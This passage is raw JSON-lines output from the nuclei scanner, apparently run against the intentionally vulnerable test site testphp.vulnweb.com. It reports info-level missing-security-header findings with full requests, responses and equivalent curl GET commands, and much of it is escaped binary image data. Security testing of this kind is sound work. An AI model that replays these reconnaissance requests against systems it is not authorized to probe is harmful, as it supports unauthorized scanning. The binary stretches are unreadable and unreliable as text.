\\u0019=3\\ufffd\\ufffd\\ufffd\\u0015E\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffdA\\ufffdx^E\\ufffd\\ufffd\\ufffd@'\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u001af\\u001bF\\ufffd\\ufffd6\\ufffd\\ufffd@\\ufffd\\u003c\\ufffd\\\",c\\ufffd\\ufffdJ)c\\ufffd!|\\u000c\\ufffdg\\ufffd\\u0001\\ufffd\\ufffd\\ufffd%\\ufffd\\u000f\\ufffd\\ufffdm!xo\\ufffd\\u0000\\ufffd\\\\\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd\\ufffd\\u003cU\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\r\\ufffd\\ufffdOG\\u0019\\ufffdD\\ufffd3\\ufffdF|\\ufffdi\\ufffd*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd.\\ufffd\\r\\u001fv\\ufffd\\ufffdX;\\ufffd\\ufffdh{\\ufffd\\ufffd\\ufffd\\\\\\u0005]\\ufffdrJ\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\u0000:\\ufffd\\ufffd\\ufffd\\ufffdD\\ufffd;!\\ufffd\\ufffd\\\"\\ufffdv\\ufffdz\\ufffdV+\\ufffd\\ufffd\\ufffd\\ufffdO\\ufffdV\\ufffd\\ufffd\\ufffdxRV=Ѝ\\ufffd\\u0004\\ufffd\\ufffdD\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd\\u0015$\\ufffdM\\ufffd\\ufffd:\\u0003\\ufffdT\\ufffd\\ufffd\\ufffdۜ\\ufffd\\ufffd[;\\ufffd\\u0010IfR\\ufffdN\\u000b\\u001e[\\ufffd\\u0006p\\u003ch\\ufffd)\\ufffd#Ս\\u000fo|\\ufffd\\u0010e:\\ufffd|\\ufffd\\u0011\\ufffd\\ufffdc\\ufffd\\ufffd\\u0010\\ufffd}\\ufffduf\\ufffd\\u000cq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-Mgj\\u0026bx\\u0003?MA\\ufffd\\ufffde\\u000c$\\ufffdH$\\u001c4r.\\ufffdS\\ufffdy\\u0007\\ufffd\\u001f\\ufffd\\ufffdt\\ufffd\\u0007\\ufffd:\\ufffdc\\ufffdyo\\u0018\\u001a\\u0005\\\"\\ufffd\\ufffd\\u001b\\ufffd\\ufffd5c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdz\\u000e\\u000f\\ufffd\\ufffdЕ\\\\\\ufffdT\\ufffd\\ufffd[N\\ufffd\\ufffd;\\ufffd\\ufffd*\\ufffdi\\ufffd\\ufffdU\\ufffd\\u0000e\\ufffd$c \\ufffdyʰP\\ufffd\\ufffd[\\u00168\\ufffd\\ufffd\\u0014\\u0014o\\ufffd\\u003c=\\u0013\\ufffdSG\\u001f\\u000c\\ufffd3\\ufffd\\u0002|ꅪ袞W\\ufffd\\ufffdZр\\ufffd;\\ufffd\\u001e\\u0018{6\\u003ed?\\ufffd\\u0006\\u001b\\ufffd\\ufffd\\ufffd\\ufffd}_\\ufffd\\ufffdY\\u001fn\\ufffdR\\ufffdH\\u0003,sQwx`\\u0000;\\u001dH \\ufffd\\u0018\\ufffd\\ufffd\\u0004{\\u001d\\u0015^\\ufffdn\\ufffd\\ufffd\\ufffdvJ\\ufffd=\\u001a\\u001b\\ufffdD\\ufffd\\ufffd2mٖ*@E\\u0001\\ufffd*\\u000cP\\u0007\\ufffdF2F\\ufffdnW8\\ufffd\\u000c' \\ufffdd\\u001d\\ufffd\\ufffdm\\ufffd\\ufffd\\ufffdo\\u0017Q\\ufffd[t\\u000f\\ufffdj\\ufffd\\ufffd\\ufffde\\u0013R\\ufffdOGN\\ufffdݎ\\ufffd\\u0011\\u001231J\\ufffd!US\\ufffd2\\u0008\\ufffd\\ufffdr\\t'ZM\\ufffd\\ufffdYx\\ufffd\\ufffdd\\u0011\\ufffd\\ufffdW\\ufffdY\\ufffd*e_F\\u0019\\u0015\\ufffd\\ufffdh\\ufffd\\ufffdK\\u0002\\ufffd\\ufffd\\ufffdIпº\\ufffdT\\r;\\ufffdf\\ufffd\\ufffd\\ufffdQ+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd;{{\\ufffd\\u0000g\\ufffd\\u00060\\ufffdc\\ufffdt۽eB[n]\\ufffdI\\ufffd\\ufffdPc\\u000b\\u0018\\u0007\\u0001pp\\u000f\\ufffd\\u00089\\ufffd\\ufffd\\ufffd\\ufffd\\u0005d\\ufffd\\u0013?\\ufffd\\ufffd\\u0001\\ufffd\\ufffds\\ufffd\\ufffd׿\\ufffd4T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd|J\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\u0015\\ufffd6\\ufffd\\ufffd\\ufffdi\\u0016)\\ufffd\\ufffd\\ufffd\\u0001e\\ufffd\\ufffdrB\\ufffd\\u0007\\ufffd\\ufffd\\u000c\\u0002\\u00179\\u0004\\u0003\\ufffdz:\\ufffd\\ufffd\\ufffdG/e@\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffdj\\ufffd\\ufffd=\\u00038P?P\\ufffd\\ufffd\\u003e\\u0017\\u001bpwj\\ufffd\\ufffd\\u0015l7\\u001b\\u001d\\ufffd\\u000b\\ufffd(\\ufffd\\ufffd\\u0011\\u0011hX\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001f(\\r\\ufffdb\\u0014\\ufffd\\ufffd\\u0017\\u0019k\\ufffd\\ufffdm\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffdjAFn\\ufffdR1\\ufffdR\\ufffd!\\ufffd=\\ufffdn\\ufffdh-\\ufffd8\\ufffd=@s\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd7G\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdP5\\u0014\\ufffdԞ'\\u0015\\ufffdݮL\\ufffd)G }\\ufffdI֫\\ufffd\\ufffd\\ufffdg\\u0002\\ufffd\\ufffd\\u0005\\ufffd\\ufffdcC\\u0015K\\ufffdd\\ufffdϾ\\u003e\\ufffdi\\ufffd'v͏\\ufffd\\ufffd\\u000c\\ufffd\\t\\ufffd\\ufffd#w_\\ufffd\\ufffd\\ufffd:k$\\ufffd\\ufffdֺ\\ufffd\\ufffd\\ufffdI\\u0017a@\\u000c\\ufffd͂\\ufffd\\u0001l\\ufffd2\\ufffd3\\ufffdS\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4v0\\ufffd\\ufffd02\\ufffd\\ufffd\\ufffd\\ufffd\\u0001$\\u001e\\ufffd\\ufffdާ\\ufffd\\ufffd\\ufffdʐq\\ufffd*L\\ufffd\\\\\\u0005{DP\\ufffdWi\\ufffd\\ufffdV\\ufffd*AK\\ufffd\\ufffdʛ\\ufffd-$S\\ufffdL\\ufffd5\\ufffd\\u0008\\ufffd\\ufffdI\\u0004\\u000f\\u001c\\ufffde\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffdX2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd#`\\u001c\\ufffd\\ufffd[`\\u003e\\ufffd\\ufffd`\\ufffd\\ufffd1*\\ufffd{\\ufffd\\ufffd1b\\u0014\\ufffdT\\ufffd\\ufffd\\ufffd\\ufffd\\u0004\\ufffdG\\ufffd\\u000c[\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4\\ufffdY]\\ufffdE\\u0010\\ufffd!\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffd\\u0000\\u000f\\ufffd\\ufffd\\u0015\\u001c\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\u000bE(\\ufffd\\ufffd\\ufffdq\\ufffd\\u003c\\ufffd\\ufffd\\ufffdΓ\\u003c#\\u0019E\\ufffd\\ufffd\\u0000\\ufffd\\u0007\\ufffd՜S}1\\ufffd\\u001d\\u0008Q\\ufffdIRf\\u0014\\ufffd\\n\\ufffdK\\ufffdy\\ufffd\\u0010\\ufffd\\ufffd0\\ufffd\\ufffd\\u0008\\u0018\\ufffd\\ufffdd\\ufffd\\ufffd8\\ufffd\\ufffd3\\ufffdu\\ufffdH\\ufffd\\ufffd\\u00063\\\"\\ufffd\\u001e\\ufffd\\u0004\\ufffdG\\ufffd\\u000c\\t\\u0007\\ufffdi\\ufffdU\\ufffd9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*-ҵ\\ufffd\\ufffd\\r\\u0011\\u0014\\ufffdq\\ufffd\\ufffd\\ufffd-ܳ\\ufffd\\ufffdR\\u00179S\\ufffdX\\ufffdA\\ufffd\\u0006\\u001c0#ʌ\\ufffdFG\\ufffdA\\ufffd\\ufffd\\u001fC\\ufffdB\\ufffd\\ufffdc\\ufffdkl\\ufffd\\ufffd0\\ufffd\\ufffd\\u0015\\ufffd\\ufffd:\\u0019\\u0003۸U\\ufffd3Av\\ufffd]\\ufffd\\ufffdZ\\ufffdyv\\ufffd\\ufffd\\ufffd0dm\\ufffd\\t\\u0001\\ufffd\\ufffd\\ufffdv.p\\u0006\\\\~ڕOr\\ufffdE\\ufffd\\ufffd\\ufffd\\t)\\ufffd\\ufffd\\u001b\\ufffd\\t$\\u001b{\\ufffd=\\ufffd\\ufffd\\ufffd8\\u0005\\ufffdό\\ufffdy\\u0007T\\ufffdN\\ufffdP!\\ufffdz\\ufffd\\ufffdV\\ufffdgJh\\ufffd\\ufffd\\ufffdul*\\ufffdKnU\\ufffd\\ufffd\\ufffd\\u0003#E6n\\ufffd\\ufffd\\ufffd\\u001b\\u0005'P\\\\\\u001e\\ufffd\\ufffdS\\u00075\\ufffd,\\ufffd;\\ufffd\\u001d\\ufffd\\ufffd[i,\\u00102\\ufffd\\ufffd\\ufffdn\\ufffds\\ufffdLUܤ\\ufffdJ8\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffda\\ufffd\\ufffd_\\u0017\\u0017\\u000e\\u001c\\ufffd\\ufffdW\\ufffdQ\\u0006J\\ufffd\\u003c-\\ufffdQ\\ufffd\\ufffd\\ufffd\\ufffdpA\\ufffd\\ufffd\\u0011\\ufffd\\ufffdt\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffd\\u0012\\u001aVffyQQ1\\ufffdA\\u0019Q\\ufffd\\ufffdC`\\ufffdDղR,]\\ufffdY\\ufffd,^'ĉ\\u001dJ+\\ufffd,\\u003eW\\ufffd\\ufffdXd`\\ufffd\\u001c\\u0010u\\ufffd\\ufffd1\\ufffd\\ufffdId\\ufffd\\ufffd\\ufffdAs5MJ\\ufffd:KT\\ufffd+\\u0018\\ufffdf\\ufffd-\\ufffd,\\ufffd\\ufffdx\\ufffdq\\ufffd\\ufffd[\\u0000\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdZ\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd\\u003c\\ufffdp\\ufffd.\\u0000\\ufffd\\u0012\\ufffd\\ufffd\\ufffd\\u0003\\ufffdq\\ufffd\\u0019\\ufffd\\ufffd0H`\\t*qQ]++J\\ufffdK$/,f)\\u000cNW\\ufffd\\ufffdʶ\\u003c\\ufffd\\ufffd\\u003ck\\ufffd\\ufffd\\ufffdN\\ufffdʉ(\\ufffd\\u001a\\ufffd\\u0001\\u0000-+2\\ufffd\\ufffd8ǥW\\ufffd1\\ufffd\\ufffdH,I$\\ufffd\\u001d\\\\\\ufffdmt\\ufffd+\\ufffd2K\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffd\\u001fՖl\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffd\\ufffdbi\\ufffdn\\ufffd[@b\\ufffd\\ufffd\\ufffd\\\"n\\ufffd\\ufffd\\ufffdΏ\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\ufffdEZU\\ufffdt\\u0010\\ufffd\\u0015,\\ufffd\\ufffdWԹQ\\ufffdF\\t\\u003c`6\\ufffd\\ufffd\\ufffd\\u0000\\u0010\\ufffd\\ufffdK\\ufffd\\ufffdl\\u0014\\ufffd\\ufffd̴\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffdŰ\\ufffds\\ufffd\\ufffd \\ufffd\\ufffdƾ|\\ufffd\\ufffd\\ufffd])^\\ufffd\\ufffd\\t\\ufffd\\ufffd\\ufffd7Ԏ\\u0007k\\ufffd\\ufffd|\\ufffd\\ufffd9\\u001e\\ufffd\\u0007\\ufffdg\\ufffd/\\ufffd3T\\ufffd\\ufffd2PR\\ufffd\\ufffd[䥑\\ufffd\\ufffdz\\ufffd\\ufffdL\\u0018\\ufffd\\ufffdW\\u0000\\ufffd!\\ufffdeJg#\\u0007\\ufffd\\ufffdu\\ufffd\\n|\\u00170\\u0002\\ufffd~\\ufffd_Ң\\ufffds\\ufffd\\u0000\\ufffd\\ufffd'\\ufffd\\ufffdQY\\ufffd\\ufffdn\\u001f\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\u000c\\ufffd\\ufffd%cR\\u0017\\u0000\\ufffd@,Wv|\\ufffd\\ufffdG,\\ufffd?X\\ufffdkii\\ufffd\\u0015@\\ufffd\\ufffda}\\ufffd\\ufffdG!,P\\u000c\\ufffd\\u000f|\\ufffd\\t\\u003c\\u0003\\ufffdh{\\ufffd\\ufffd \\ufffd\\ufffdf\\ti\\ufffd\\ufffd2\\ufffd\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\ufffd\\ufffdX\\ufffd\\u001c\\ufffd\\u001fvÝہ\\u0019\\u0007X\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffdm E,\\ufffd\\ufffd\\ufffddv\\ufffd\\u0017R0\\ufffd\\u0001\\ufffd\\u000c\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\ufffdE%\\ufffd\\ufffd4\\ufffd\\u0001\\u0000g\\u001e#l\\u001f\\ufffd\\ufffdDI8n\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd?m\\ufffdD\\ufffdl\\ufffdU\\ufffd\\u001dxl6\\u003c\\ufffd\\ufffd\\u001f\\ufffd\\u000f\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd !\\ufffdx\\ufffd⎵\\ufffd\\u0005\\ufffd^\\ufffdc\\ufffd\\u0013hR\\u000eO\\ufffd\\ufffd,Ř\\ufffd\\\\\\ufffd9ZZ\\ufffd\\ufffd1\\ufffd\\ufffddu\\tU\\u001b\\ufffd$\\ufffd\\u003e\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd3h\\ufffdj\\ufffd\\ufffd\\u0015\\ufffd\\u000cdp]\\u0002'\\ufffd\\ufffd\\ufffd\\u0019S\\ufffd\\ufffd\\ufffd8\\u0004k@\\ufffdė\\ufffd\\ufffdq\\\\n۪\\ufffd\\u0019e\\ufffdY\\u001d\\ufffdQZF$\\ufffd\\u000e\\t\\ufffd\\ufffd'?3\\u000f\\u0007\\u001aZZAZ\\ufffd\\ufffd\\u0018\\ufffd\\u000c\\u001e\\u003e\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffd\\u001b?Kt\\ufffd[\\ufffd\\ufffd~k\\u000b\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdj1\\ufffd`\\r\\ufffd\\ufffd\\ufffd\\u001f\\ufffd`\\n1#,x\\u0007KKU\\u0016\\ufffdL\\u001cG|\\ufffd\\ufffdO^\\u003e0\\u0017\\ufffd\\ufffd\\ufffdS$K;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd6bU\\u0001bH\\u0003\\u003cd\\ufffd\\ufffd\\u0016P\\ufffdr\\ufffd\\u0000\\u0018\\ufffd\\u001aZZmn\\u0000F\\u0008Jn\\ufffd\\ufffdaL.\\ufffd\\ufffd\\ufffd\\ufffdRQ\\ufffdϨl\\ufffd5\\u000f\\\"\\ufffdS_\\u0005;\\ufffd\\ufffdkly\\u0002\\ufffd\\u000f\\ufffd\\u0007Ζ\\ufffd\\ufffd\\ufffd$S\\ufffd\\ufffd\\ufffd\\u0003B\\u0001\\ufffd\\ufffdU_\\r\\ufffdpuWX\\ufffd\\ufffdwf\\ufffd\\ufffd\\u0026\\u000c\\ufffd,m\\ufffd\\ufffd\\ufffd-\\ufffd\\ufffd\\u0002F\\u000e9ǂ5\\ufffdX\\ufffdd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd鈒\\ufffdA\\u0014i\\u0014O\\ufffd,\\u000b\\u0014;\\ufffd\\ufffd\\ufffdң\\ufffd\\ufffdϜaik\\ufffd{@\\ufffd\\ufffd\\ufffd\\t\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u0000\\ufffdN\\ufffd%\\ufffd\\ufffdIGE\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0018鷡U%\\ufffd\\t\\\\\\ufffd\\u000cĐ\\ufffd\\ufffd\\ufffd\\u0007\\ufffdA9ڸ1\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdui_RgM\\ufffdYʾ\\u000fv#\\ufffd\\ufffdr}M\\ufffd?1\\ufffdx\\ufffd\\ufffd֩\\u003e*Fqk\\ufffd\\ufffd\\ufffd9\\ufffdE\\ufffd\\ufffdT\\ufffd5L\\ufffd\\ufffd\\u001bܖ8\\u0018\\u0019Ή\\ufffd\\u0016\\ufffd\\ufffdA\\ufffd6x\\ufffdj\\ufffd\\ufffd\\u0013ԤNar\\ufffd\\ufffd\\u0010\\u0008\\ufffdA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdw\\u000f\\u000f\\ufffd\\u0011\\ufffd:\\ufffd\\u0007\\ufffdhi\\u001a\\ufffd4\\ufffd\\ufffd)\\ufffdnW\\n\\ufffdi\\ufffda$B\\u0002E6\\u001dP\\ufffd\\u0003\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffdi\\u0005\\ufffd\\ufffd\\ufffdD\\ufffdT\\ufffd(\\ufffd\\u0019\\u000b\\ufffd\\u000br\\ufffdP\\ufffd\\u0000\\ufffd@\\ufffd\\ufffd\\u001f\\ufffdKK\\\\\\ufffdW\\ufffd\\ufffdX3տ\\ufffd՟#\\ufffdVY\\ufffd\\ufffd\\ufffdC\\u001d\\u0002\\ufffdv;\\ufffdU\\ufffd\\ufffd\\u000c\\ufffdHwaDn\\ufffd\\u0000\\ufffd\\ufffd1\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffdVR\\ufffd\\u0013;,Ԑ\\ufffd6\\ufffd\\u000e\\u0019\\ufffd$\\u000e\\u003ciij\\ufffd\\ufffd\\ufffdLM\\u0005.\\ufffd\\ufffd+\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:29.447890339Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36' 'http://testphp.vulnweb.com/pictures/7.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19\",\"path\":\"/wvstests/pmwiki_2_1_19\",\"matched-at\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19/\",\"request\":\"GET /wvstests/pmwiki_2_1_19 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:25 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /wvstests/pmwiki_2_1_19/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /wvstests/pmwiki_2_1_19/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"scripts/\\\"\\u003escripts/\\u003c/a\\u003e 08-Apr-2013 08:44 -\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:29.984852109Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59' 'http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"path\":\"/pictures/8.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"request\":\"GET /pictures/8.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4139\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:25 GMT\\r\\nEtag: \\\"4dca64a1-102b\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0000\\u0002\\u0003\\u0004\\u0005\\u0001\\u0007\\u0008\\ufffd\\ufffd\\u0000;\\u0010\\u0000\\u0001\\u0003\\u0002\\u0004\\u0002\\u0006\\u0008\\u0005\\u0004\\u0002\\u0003\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0000\\u0004\\u0005\\u0012!1AQ\\u0006\\u0013\\\"aq\\ufffd\\u00142T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$B\\ufffd\\ufffd\\ufffd\\u0015#3\\ufffdRb4r\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0000\\u0003\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000(\\u0011\\u0000\\u0002\\u0001\\u0003\\u0003\\u0004\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011!\\u0004\\u00141\\u0005\\u0012AQ\\u0013\\u0015\\\"B2ab\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffdS\\ufffdK\\ufffd\\ufffd@\\ufffd\\u001bU\\u0010z\\ufffd~\\u001d*D\\ufffd\\ufffd\\ufffd@e\\ufffd\\ufffd\\u0012+\\ufffdoQ\\ufffd\\ufffdVߩ\\ufffd}I\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{9%L\\ufffdOy\\u0014ÃX\\ufffdz\\ufffd?\\ufffd\\ufffdh\\ufffd\\\"2\\ufffd\\ufffd0\\u000f\\ufffd5ޤѺ\\ufffd\\u000bU\\ufffd\\ufffdZ|\\u000c\\ufffd\\ufffd\\ufffdvv\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\u0003)\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffdR\\ufffd\\ufffd\\ufffdEã\\ufffdo\\ufffdt\\u001f\\u0014\\nc\\ufffd5\\ufffduB\\ufffd\\u000fq\\ufffd\\ufffd\\ufffd\\ufffd\\u001b\\ufffd\\ufffd\\ufffdt\\ufffdH\\ufffd)\\ufffdl\\u0007\\ufffd\\ufffd N\\u0015{\\u001e\\ufffd\\u0003\\ufffdU]\\ufffd7\\u0012`\\ufffd\\tM\\ufffd\\ufffdaT\\ufffd\\ufffdh\\ufffdk\\ufffd-\\u0026\\u001el)=\\ufffd\\u0002\\ufffdF\\u0013k\\ufffd\\ufffd\\u0000\\u0018\\ufffd\\ufffd\\u0000\\ufffdW6\\ufffd\\ufffd$\\ufffd\\ufffdS\\ufffd\\ufffdu\\ufffd\\u000ey\\ufffdeQ\\ufffd\\ufffd\\u0015\\ufffdI9g\\ufffd\\ufffd\\u0017\\ufffd0$\\ufffd\\u0015\\ufffd\\ufffd56\\u000c\\ufffdm\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdN\\ufffdOq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdƲh|\\ufffd\\ufffd\\ufffdI/2\\u001a,-\\ufffd\\ufffd\\ufffd$w\\u001d~uE\\ufffd[ 